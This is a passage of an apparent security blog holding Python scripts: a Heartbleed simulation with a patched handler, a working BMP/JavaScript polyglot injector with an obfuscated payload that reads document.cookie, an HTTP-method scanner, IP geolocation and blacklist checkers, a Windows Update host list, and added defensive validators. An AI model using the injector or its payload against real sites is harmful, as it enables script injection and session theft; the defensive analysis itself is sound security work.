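The probe the script sends ("18 03 02 00 03 01 40 00") is a heartbeat record whose message claims 0x4000 bytes of payload while carrying none. To show why that leaks memory, and what the OpenSSL 1.0.1g fix changed, the Python 3 simulation below is added here as an example; it is not part of the original post or of OpenSSL. The "heap" and the marker string inside it are constructed byte strings, and the two handler functions model the heartbeat processing before and after the fix.

```python
import struct

HEARTBEAT_REQUEST, HEARTBEAT_RESPONSE = 1, 2
MIN_PADDING = 16  # RFC 6520 requires at least 16 bytes of padding


def build_heartbeat(payload, declared_length=None, padding=b"\x00" * MIN_PADDING):
    """Build a HeartbeatMessage: type(1) | payload_length(2) | payload | padding.

    declared_length lets a caller claim more payload than is actually present,
    which is exactly the malformed request in CVE-2014-0160.
    """
    if declared_length is None:
        declared_length = len(payload)
    return struct.pack(">BH", HEARTBEAT_REQUEST, declared_length) + payload + padding


def process_heartbeat_vulnerable(record, memory_after_record):
    """Pre-1.0.1g behaviour: trust payload_length and copy that many bytes.

    memory_after_record simulates whatever heap memory happens to follow the
    record buffer; an over-declared length reads straight into it.
    """
    hb_type, payload_length = struct.unpack(">BH", record[:3])
    if hb_type != HEARTBEAT_REQUEST:
        return None
    heap = record[3:] + memory_after_record   # contiguous heap, no bounds check
    echoed = heap[:payload_length]
    return struct.pack(">BH", HEARTBEAT_RESPONSE, payload_length) + echoed + b"\x00" * MIN_PADDING


def process_heartbeat_fixed(record):
    """1.0.1g behaviour: discard a request whose declared payload cannot fit.

    The check is 1 + 2 + payload_length + 16 <= record length; a malformed
    message is silently dropped, so the client gets no response and no alert.
    """
    if len(record) < 1 + 2 + MIN_PADDING:
        return None
    hb_type, payload_length = struct.unpack(">BH", record[:3])
    if hb_type != HEARTBEAT_REQUEST:
        return None
    if 1 + 2 + payload_length + MIN_PADDING > len(record):
        return None
    payload = record[3:3 + payload_length]
    return struct.pack(">BH", HEARTBEAT_RESPONSE, payload_length) + payload + b"\x00" * MIN_PADDING


def leaked_bytes(response, real_payload):
    """Number of bytes a response echoes beyond the payload the client really sent."""
    if response is None:
        return 0
    _t, length = struct.unpack(">BH", response[:3])
    return max(0, length - len(real_payload))


# Constructed inputs (not captured traffic). FAKE_HEAP stands in for memory that
# sits after the request buffer; the marker value in it is made up.
FAKE_HEAP = b"...Cookie: session=SESSION_VALUE_CONSTRUCTED; ...more heap..." * 400
GOOD_REQUEST = build_heartbeat(b"ping")
# Declares 0x4000 payload bytes while sending none, like the "01 40 00" probe above.
MALFORMED_REQUEST = build_heartbeat(b"", declared_length=0x4000, padding=b"")

if __name__ == "__main__":
    cases = (("well-formed", b"ping", GOOD_REQUEST), ("malformed", b"", MALFORMED_REQUEST))
    for label, real_payload, req in cases:
        vuln = process_heartbeat_vulnerable(req, FAKE_HEAP)
        fixed = process_heartbeat_fixed(req)
        print("%-12s vulnerable handler leaks %5d bytes; fixed handler replies: %s"
              % (label, leaked_bytes(vuln, real_payload), fixed is not None))
```

The silent drop in the fixed handler is also why the script's "No heartbeat response received" branch reads as "likely not vulnerable": a patched server neither echoes nor sends an alert for the malformed request.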
<br />
Reference:<br />
http://www.exploit-db.com/exploits/32745/<br />
http://heartbleed.com/<br />
<br />
Thanks.Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-13207255705178821192014-03-31T13:36:00.001+08:002020-01-07T02:09:05.437+08:00BMP INJECTION Python.This script injects JavaScript source into a BMP file.<br />
If you need to test how an upload handler treats a BMP that contains JavaScript, you can use bmpinjection.py.<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">#!/usr/bin/env python2
#============================================================================================================#
#======= Simply injects a JavaScript Payload into a BMP. ====================================================#
#======= The resulting BMP must be a valid (not corrupted) BMP. =============================================#
#======= Author: marcoramilli.blogspot.com ==================================================================#
#======= Version: PoC (don't even think to use it in development env.) ======================================#
#======= Disclaimer: ========================================================================================#
#THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
#IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
#DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
#INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
#SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
#HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
#STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
#IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
#POSSIBILITY OF SUCH DAMAGE.
#===========================================================================================================#
import argparse
import os

#---------------------------------------------------------
def _hexify(num):
    """
    Converts and formats to hexadecimal
    """
    num = "%x" % num
    if len(num) % 2:
        num = '0'+num
    return num.decode('hex')

#---------------------------------------------------------
#Example payload: "var _0xe428=[\""+ b'\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64' + "\"]
#;alert(_0xe428[0]);"
def _generate_and_write_to_file(payload, fname):
    """
    Generates a fake but valid BMP with scripting inside
    """
    f = open(fname, "wb")
    header = (b'\x42\x4D'              #Signature BM
              b'\x2F\x2A\x00\x00'      #Header File size, but encoded as /* <-- Yes it's a valid header
              b'\x00\x00\x00\x00'      #Reserved
              b'\x00\x00\x00\x00'      #bitmap data offset
              b''+ _hexify( len(payload) ) + #bitmap header size
              b'\x00\x00\x00\x14'      #width 20pixel .. it's up to you
              b'\x00\x00\x00\x14'      #height 20pixel .. it's up to you
              b'\x00\x00'              #nb_plan
              b'\x00\x00'              #nb per pixel
              b'\x00\x10\x00\x00'      #compression type
              b'\x00\x00\x00\x00'      #image size .. it's ignored
              b'\x00\x00\x00\x01'      #Horizontal resolution
              b'\x00\x00\x00\x01'      #Vertical resolution
              b'\x00\x00\x00\x00'      #number of colors
              b'\x00\x00\x00\x00'      #number important colors
              b'\x00\x00\x00\x80'      #palette colors to be compliant
              b'\x00\x80\xff\x80'      #palette colors to be compliant
              b'\x80\x00\xff\x2A'      #palette colors to be compliant
              b'\x2F\x3D\x31\x3B'      #*/=1;
              )
    # I made this explicit, step by step.
    f.write(header)
    f.write(payload)
    f.close()
    return True

#---------------------------------------------------------
def _generate_launching_page(f):
    """
    Creates the HTML launching page
    """
    htmlpage ="""<html>
<head><title>Opening an image</title> </head>
<body>
<img src=\"""" + f + """\"\>
<script src= \"""" + f + """\"> </script>
</body>
</html>
"""
    html = open("run.html", "wb")
    html.write(htmlpage)
    html.close()
    return True

#---------------------------------------------------------
def _inject_into_file(payload, fname):
    """
    Injects the payload into existing BMP
    NOTE: if the BMP contains \xFF\x2A it might cause issues
    """
    # I know, I can do it all in memory and much faster.
    # I won't do it here.
    f = open(fname, "r+b")
    b = f.read()
    # Neutralise any accidental "*/" in the pixel data so the comment is not closed early.
    b = b.replace(b'\x2A\x2F',b'\x00\x00')
    f.close()
    f = open(fname, "w+b")
    f.write(b)
    f.seek(2,0)
    f.write(b'\x2F\x2A')
    f.close()
    f = open(fname, "a+b")
    f.write(b'\xFF\x2A\x2F\x3D\x31\x3B')
    f.write(payload)
    f.close()
    return True

#---------------------------------------------------------
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("filename",help="the bmp file name to be generated/or infected")
    parser.add_argument("js_payload",help="the payload to be injected. For example: \"alert(\"test\");\"")
    parser.add_argument("-i", "--inject-to-existing-bmp", action="store_true", help="inject into the current bitmap")
    args = parser.parse_args()
    print("""
|======================================================================================================|
| [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal.          |
| It is the end user's responsibility to obey all applicable local, state and federal laws.            |
| Authors assume no liability and are not responsible for any misuse or damage caused by this program  |
|======================================================================================================|
""")
    if args.inject_to_existing_bmp:
        _inject_into_file(args.js_payload, args.filename)
    else:
        _generate_and_write_to_file(args.js_payload, args.filename)
    _generate_launching_page(args.filename)
    print "[+] Finished!"
</code></pre>
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> c:\Python27\python.exe bmpinject.py -i 1.bmp "var _0x9c4c=\"\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\"; function Msgbox(_0xccb4x3){alert(eval(_0xccb4x3));};Msgbox(_0x9c4c);"
</code></pre>
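From the receiving side, the polyglot above gets through because most upload handlers look only at the "BM" signature or the file extension. The Python 3 validator below is an added example, not from the original post or from the injector script, of the header-consistency checks that reject such a file: the bogus bfSize ("/*" reads as 0x2A2F), a pixel-data offset that does not match the header layout, and bytes trailing the pixel array. The clean BMP and the patched copy are constructed inline.

```python
import struct

FILE_HEADER_LEN = 14      # BITMAPFILEHEADER
INFO_HEADER_LEN = 40      # BITMAPINFOHEADER


def row_stride(width, bpp):
    """Bytes per pixel row, padded to a 4-byte boundary as the BMP format requires."""
    return ((width * bpp + 31) // 32) * 4


def build_minimal_bmp(width=2, height=2):
    """Construct a tiny valid 24-bit BMP (a test fixture, not a real upload)."""
    pixel_bytes = row_stride(width, 24) * height
    off_bits = FILE_HEADER_LEN + INFO_HEADER_LEN
    file_header = b"BM" + struct.pack("<IHHI", off_bits + pixel_bytes, 0, 0, off_bits)
    info_header = struct.pack("<IiiHHIIiiII", INFO_HEADER_LEN, width, height, 1, 24,
                              0, pixel_bytes, 2835, 2835, 0, 0)
    return file_header + info_header + b"\x00" * pixel_bytes


def validate_bmp(data, max_dimension=8192):
    """Return (ok, reason); accept only files whose headers agree with their bytes."""
    if len(data) < FILE_HEADER_LEN + INFO_HEADER_LEN:
        return False, "too short for BMP headers"
    if data[:2] != b"BM":
        return False, "bad signature"
    file_size, _r1, _r2, off_bits = struct.unpack("<IHHI", data[2:14])
    if file_size != len(data):
        return False, "bfSize %d != actual size %d" % (file_size, len(data))
    (hdr_size, width, height, planes, bpp, compression, _img_size,
     _xppm, _yppm, colors_used, _important) = struct.unpack("<IiiHHIIiiII", data[14:54])
    if hdr_size != INFO_HEADER_LEN:
        return False, "unsupported DIB header size %d" % hdr_size
    # height may be negative for top-down bitmaps, hence abs()
    if not (0 < width <= max_dimension and 0 < abs(height) <= max_dimension):
        return False, "implausible dimensions %dx%d" % (width, height)
    if planes != 1 or bpp not in (1, 4, 8, 24, 32):
        return False, "bad planes/bpp %d/%d" % (planes, bpp)
    if compression != 0:
        return False, "compressed BMP not accepted"
    palette_entries = colors_used if colors_used else (1 << bpp if bpp <= 8 else 0)
    expected_off = FILE_HEADER_LEN + hdr_size + 4 * palette_entries
    if off_bits != expected_off:
        return False, "bfOffBits %d != expected %d" % (off_bits, expected_off)
    if off_bits + row_stride(width, bpp) * abs(height) != len(data):
        return False, "trailing data after pixel array"
    return True, "ok"


# Constructed fixtures. POLYGLOT_BMP applies the same two edits the -i mode of the
# injector above makes: "/*" written over bfSize, then "\xff*/=1;" plus script appended.
CLEAN_BMP = build_minimal_bmp()
POLYGLOT_BMP = b"BM" + b"\x2f\x2a" + CLEAN_BMP[4:] + b"\xff\x2a\x2f\x3d\x31\x3b" + b"x=1;"

if __name__ == "__main__":
    samples = (("clean", CLEAN_BMP), ("polyglot", POLYGLOT_BMP), ("trailing", CLEAN_BMP + b"*/x=1;"))
    for name, blob in samples:
        print("%-9s %s" % (name, validate_bmp(blob)))
```

Re-encoding accepted images with an image library before storing them removes any appended script as well, but the structural check above is cheap and gives a logged reason for each rejection.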
<br />Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-55080721654104853712014-03-20T15:44:00.001+08:002014-03-20T15:44:31.251+08:00Web METHOD CHECKSometimes I need to check which HTTP methods many URLs allow, such as "TRACE", "DELETE", "PUT" and "COPY".<br />
<br />
So, I just made a simple Python script. :)<br />
<br />
Readme:<br />
url.txt: keep the URL list (one host per line) in the same directory as the script.<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">
import re
import socket
import ssl


def main():
    # Port that is treated as SSL/TLS
    ssl_port = 443
    # Ports to check for every host
    port = ["80"]
    # Host list: url.txt, one hostname per line
    urldata = open("url.txt", "r")
    count = 0
    for i in urldata:
        count += 1
        i = i.strip('\n')
        for j in port:
            isheader(i, int(j), count, ssl_port)
    urldata.close()
    print("\r\nFINISH. Thank you")


def savingR(port, num, url, msg):
    # Append a finding to result_PORT.txt
    fp_r = open("result_" + str(port) + ".txt", "a")
    fp_r.write("[" + str(num) + "]" + url + ":" + str(port) + "-" + msg + "\r\n")
    fp_r.flush()
    fp_r.close()


def Msgprint(url, port, msg):
    print("%s(%d): Done [%s]" % (url, port, msg))


def isheader(url, port, num, ssl_port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(10)
    try:
        try:
            s.connect((url, port))
        except socket.error:
            msg = "Closed port(ssl)" if port == ssl_port else "Closed port"
            Msgprint(url, port, msg)
            s.close()
            return 0
        if ssl_port == port:
            # socket.ssl() no longer exists in Python 3; wrap the socket with the ssl module.
            # Like the old socket.ssl(), this does not verify the server certificate.
            ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
            ctx.check_hostname = False
            ctx.verify_mode = ssl.CERT_NONE
            s = ctx.wrap_socket(s, server_hostname=url)
        s.sendall("OPTIONS / HTTP/1.0\r\n\r\n".encode('utf-8'))
        buf = s.recv(1024).decode('utf-8', 'replace')
        s.close()
        if not buf:
            msg = "Not Return from this server"
            Msgprint(url, port, msg)
            return 0
        # Keep only the Allow header line(s) from the response
        msg = ''.join(re.findall('Allow:.*', buf))
        if msg == "":
            msg = "Nothing"
        if re.search(r'PUT|COPY|DELETE|TRACE', msg):
            # To save results
            savingR(port, num, url, msg)
            msg += "] [*FOUND"
        Msgprint(url, port, msg)
    except (socket.timeout, OSError):
        msg = "Timeout"
        Msgprint(url, port, msg)
        s.close()
        return 0


main()
</code></pre>
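As an added example (not the post's script), here is a defender-side version of the same check: it parses the Allow header as a header rather than by substring match, fetches it with a plain OPTIONS request over TCP or TLS, and, because it needs something to talk to, carries a constructed localhost server that advertises a chosen Allow value so the whole thing runs offline. RISKY holds the four methods the post looks for; serve() and _AllowHandler are test scaffolding, not part of any real server.

```python
import socket
import ssl
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Methods the post looks for; none should be reachable on an ordinary site.
RISKY = {"PUT", "DELETE", "COPY", "TRACE"}

def allowed_methods(raw_response):
    # Parse the Allow header properly: case-insensitive name, comma-separated
    # tokens, headers only. 'PUT' in a body or another header is not a method.
    head = raw_response.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1", "replace")
    methods = set()
    for line in head.split("\r\n")[1:]:          # [1:] skips the status line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "allow":
            methods.update(m.strip().upper() for m in value.split(",") if m.strip())
    return methods

def options_request(host, port, use_tls=False, timeout=10):
    # HTTP/1.0 without keep-alive, so the server closes and recv() hits EOF.
    sock = socket.create_connection((host, port), timeout=timeout)
    if use_tls:  # verifies the server certificate, unlike the post's socket.ssl()
        sock = ssl.create_default_context().wrap_socket(sock, server_hostname=host)
    with sock:
        sock.sendall(b"OPTIONS / HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n")
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)          # b'' when the server answered nothing

class _AllowHandler(BaseHTTPRequestHandler):
    # Constructed throwaway server advertising a fixed Allow header (demo only).
    allow = "GET, HEAD, OPTIONS"
    def do_OPTIONS(self):
        self.send_response(200)
        self.send_header("Allow", self.allow)
        self.end_headers()
    def log_message(self, *args):
        pass

def serve(allow):
    # Start the fake server on a random localhost port and return that port.
    handler = type("Handler", (_AllowHandler,), {"allow": allow})
    srv = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv.server_address[1]
```

Against a host you administer, `allowed_methods(options_request(host, 443, use_tls=True)) & RISKY` returns the set of risky methods it advertises, or an empty set when none are exposed.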
<br />Kerz<br />
<br />
IP location information (2014-02-20)<br />
<br />
I wrote a small script to get location information for a list of IPs.<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">
from urllib.request import urlopen
from urllib.parse import quote


def iplocation(ip):
    # Ask hostip.info for the plain-text record of one IP; the first line is "Country: ..."
    url = 'http://api.hostip.info/get_html.php?ip=' + quote(ip) + '&position=true'
    response = urlopen(url, timeout=10).read().decode('utf-8', 'replace')
    return response


iplists = open('iplists.txt', 'r')
save = open('result.csv', 'w')
for ip in iplists:
    ip = ip.strip()
    print(" " * 8 + "[-] " + ip)
    response = iplocation(ip)
    response = response.split("\n")
    # "Country: UNITED STATES (US)" -> keep the part after the colon
    country = response[0].split(":")
    result = country[1].strip()
    save.write(ip + ",\"" + result + "\"\n")
    if result:
        print(" " * 12 + result)
iplists.close()
save.close()
</code></pre>
<br />
Put the IPs into iplists.txt, one per line; the script writes result.csv.<br />
<br />Kerz<br />
<br />
DNS BLACK LIST Information (2014-02-20)<br />
<br />
I needed to analyze some IPs, so I needed to check DNS blacklists.<br />
<div>
<br /></div>
<div>
I made a simple DNS blacklist checker using Python.</div>
<div>
<br /></div>
<div>
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">
import requests
from bs4 import BeautifulSoup

USER_AGENT = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
ACCEPT = "application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*"


def blacklist(ip):
    # Query the Spamhaus lookup page and see whether it reports the IP as listed
    results = requests.get("http://www.spamhaus.org/query/bl",
                           params={"ip": ip},
                           headers={"Host": "www.spamhaus.org",
                                    "User-Agent": USER_AGENT,
                                    "Accept": ACCEPT,
                                    "Accept-Encoding": "gzip, deflate",
                                    "Accept-Language": "ko-KR",
                                    "Connection": "keep-alive"},
                           timeout=15)
    soup = BeautifulSoup(results.text, "html.parser")
    # The page shows hits in bold, e.g. "... is listed in the SBL";
    # check every bold tag before deciding, not just the first one
    for item in soup.find_all('b'):
        if "is listed in the" in item.text:
            return "Block"
    return "Allow"


iplists = open('iplists.txt', 'r')
save = open('result.csv', 'w')
for ip in iplists:
    ip = ip.strip()
    print(" " * 8 + "[-] " + ip)
    result = blacklist(ip)
    save.write(ip + ",\"" + result + "\"\n")
    if result:
        print(" " * 12 + result)
iplists.close()
save.close()
</code></pre>
<br />
Put the IPs into iplists.txt, one per line; the script writes result.csv.<br />
<br /></div>
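The script above scrapes the Spamhaus lookup page, but a DNS blacklist is built to be queried over DNS itself: reverse the IPv4 octets, append the zone, and resolve the name; an answer inside 127.0.0.0/8 means listed and NXDOMAIN means not listed. The following is an added example, not the post's code: the ZEN answer-code meanings are taken from Spamhaus's public documentation, 127.0.0.2 is the test address every DNSBL must list (RFC 5782), and the resolver is injectable so the constructed fake_resolve below lets it run offline.

```python
import ipaddress
import socket

# Spamhaus ZEN answer codes (per its public documentation): which sub-list caused the hit.
ZEN_CODES = {
    "127.0.0.2": "SBL", "127.0.0.3": "SBL CSS",
    "127.0.0.4": "XBL", "127.0.0.5": "XBL", "127.0.0.6": "XBL", "127.0.0.7": "XBL",
    "127.0.0.10": "PBL", "127.0.0.11": "PBL",
}

def dnsbl_name(ip, zone="zen.spamhaus.org"):
    # Build the query name: reversed octets plus the zone (IPv4 only).
    addr = ipaddress.IPv4Address(ip)            # raises ValueError on junk input
    return ".".join(reversed(str(addr).split("."))) + "." + zone

def classify(answer):
    # Map a DNSBL A-record answer to a list name. Anything outside 127.0.0.0/8
    # is not a listing (typically a resolver or ISP rewriting NXDOMAIN).
    if ipaddress.IPv4Address(answer) not in ipaddress.IPv4Network("127.0.0.0/8"):
        return "invalid"
    return ZEN_CODES.get(answer, "listed (unknown code)")

def lookup(ip, zone="zen.spamhaus.org", resolve=socket.gethostbyname):
    # 'Allow' when not listed, otherwise the list name. `resolve` is injectable
    # so the check can be exercised without network access.
    try:
        answer = resolve(dnsbl_name(ip, zone))
    except socket.gaierror:
        return "Allow"                          # NXDOMAIN: not on the list
    return classify(answer)

# Constructed fake resolver standing in for DNS in a demo or test run.
FAKE_DNS = {
    "2.0.0.127.zen.spamhaus.org": "127.0.0.2",  # RFC 5782 test entry
    "10.2.0.192.zen.spamhaus.org": "127.0.0.4", # made-up XBL hit for 192.0.2.10
}

def fake_resolve(name):
    try:
        return FAKE_DNS[name]
    except KeyError:
        raise socket.gaierror(-2, "Name or service not known")

if __name__ == "__main__":
    for ip in ("127.0.0.2", "192.0.2.10", "192.0.2.99"):
        print(ip, "->", lookup(ip, resolve=fake_resolve))
```

Dropping the `resolve=` argument makes lookup() use the system resolver, which is the form to loop over iplists.txt with; note that Spamhaus answers differently when queried through large public resolvers, so run it from a resolver you control.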
Kerz<br />
<br />
How to have Windows Update IP ranges (2014-02-20)<br />
<br />
I have been thinking about how to get the Windows Update IP ranges.<br />
<div>
I could find the Windows Update URLs. However, our firewall cannot use URL (hostname) information.</div>
<div>
It can only use IP addresses, which is the problem.</div>
<div>
<br /></div>
<div>
So I just share the Windows Update URLs here.</div>
<div>
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> www.update.microsoft.com
update.microsoft.com
v5.windowsupdate.microsoft.com
download.windowsupdate.com
c.microsoft.com
windowsupdate.microsoft.com
v4.windowsupdate.microsoft.com
windowsupdate.com
ntservicepack.microsoft.com
wustat.windows.com
au.download.windowsupdate.com
updates.installshield.com
microsoft.com
urs.microsoft.com
go.microsoft.com
start.microsoft.com
crl.microsoft.com
catalog.update.microsoft.com
validation.sls.microsoft.com
na.activation.sls.microsoft.com
activation.sls.microsoft.com
sls.microsoft.com.nsatc.net
validation.sls.microsoft.com.nsatc.net
activation.sls.microsoft.com.nsatc.net
emea.activation.sls.microsoft.com
mpa.one.microsoft.com
download.microsoft.com
</code></pre>
<br />
The Windows Update IPs are not fixed; they change over time...</div>
Kerz